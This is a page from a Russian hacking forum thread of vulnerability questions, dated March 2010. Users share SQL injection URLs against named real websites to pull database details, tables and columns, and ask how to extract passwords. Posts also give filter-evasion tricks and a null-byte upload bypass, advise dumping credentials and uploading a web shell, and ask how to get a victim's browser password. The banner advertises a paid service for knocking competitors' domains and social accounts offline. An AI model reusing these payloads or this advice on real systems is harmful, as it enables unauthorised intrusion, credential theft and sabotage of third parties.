Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1179 из 1393

1179

Опции темы

Поиск в этой теме

Опции просмотра

#11781

03.03.2010, 19:16

2Fed123

Познающий

Регистрация: 26.02.2009

Сообщений: 65

Провел на форуме:
226426

Репутация: 5

Отправить сообщение для 2Fed123 с помощью ICQ

or+1=(/*!select*/+table_name+from+information_schema.tables)--
ругается Line 1: Incorrect syntax near '/'.

#11782

03.03.2010, 20:18

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру)

Код:

sElEcT

А если же str_ireplace, тогда так:

Код:

seselectlect

Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.

#11783

03.03.2010, 20:21

Pikachu

Новичок

Регистрация: 03.11.2006

Сообщений: 1

Провел на форуме:
5695

Репутация: 0

Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?

#11784

04.03.2010, 01:40

Sharsky

Новичок

Регистрация: 03.03.2010

Сообщений: 9

Провел на форуме:
29833

Репутация: 0

Не могу до конца раскрутить скул:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--

Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--

Дальше поля:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--

-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)

#11785

04.03.2010, 02:25

v1d0qz

Познающий

Регистрация: 21.07.2007

Сообщений: 68

Провел на форуме:
947074

Репутация: 257

Цитата:

Сообщение от Sharsky

Не могу до конца раскрутить скул:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--

Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--

Дальше поля:

Код:

http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--

Для начала...
http://forum.antichat.ru/thread104591.html

#11786

04.03.2010, 07:50

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

как обойти такую конструкцию?)

Цитата:

$uploaddir = "../photos/";
$fext = ".gif";
move_uploaded_file($_FILES[$key]['tmp_name'], $uploaddir . $row['ID'] . "." . $key . $fext)

на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?

#11787

04.03.2010, 09:53

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Да, не хватает. А обычные гифки тоже не грузятся?

#11788

04.03.2010, 13:08

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Цитата:

http://ukr-link.com/index.php?idd=catalog&group=142'

мож кто попробует вывести или еще что ?

#11789

04.03.2010, 14:13

AtomoS

Познающий

Регистрация: 17.02.2010

Сообщений: 64

Провел на форуме:
132243

Репутация: 1

начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(

#11790

04.03.2010, 14:54

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от AtomoS

начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(

подключится к БД и сдампить/вытащить пароли и попробовать к админке сайта или через mysql залить шелл и юзать полноценный шелл ....
P.S Зачем ломал то если не знаеш что делать дальше ? ))

Последний раз редактировалось shell_c0de; 04.03.2010 в 16:21..

Страница 1179 из 1393

1179

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход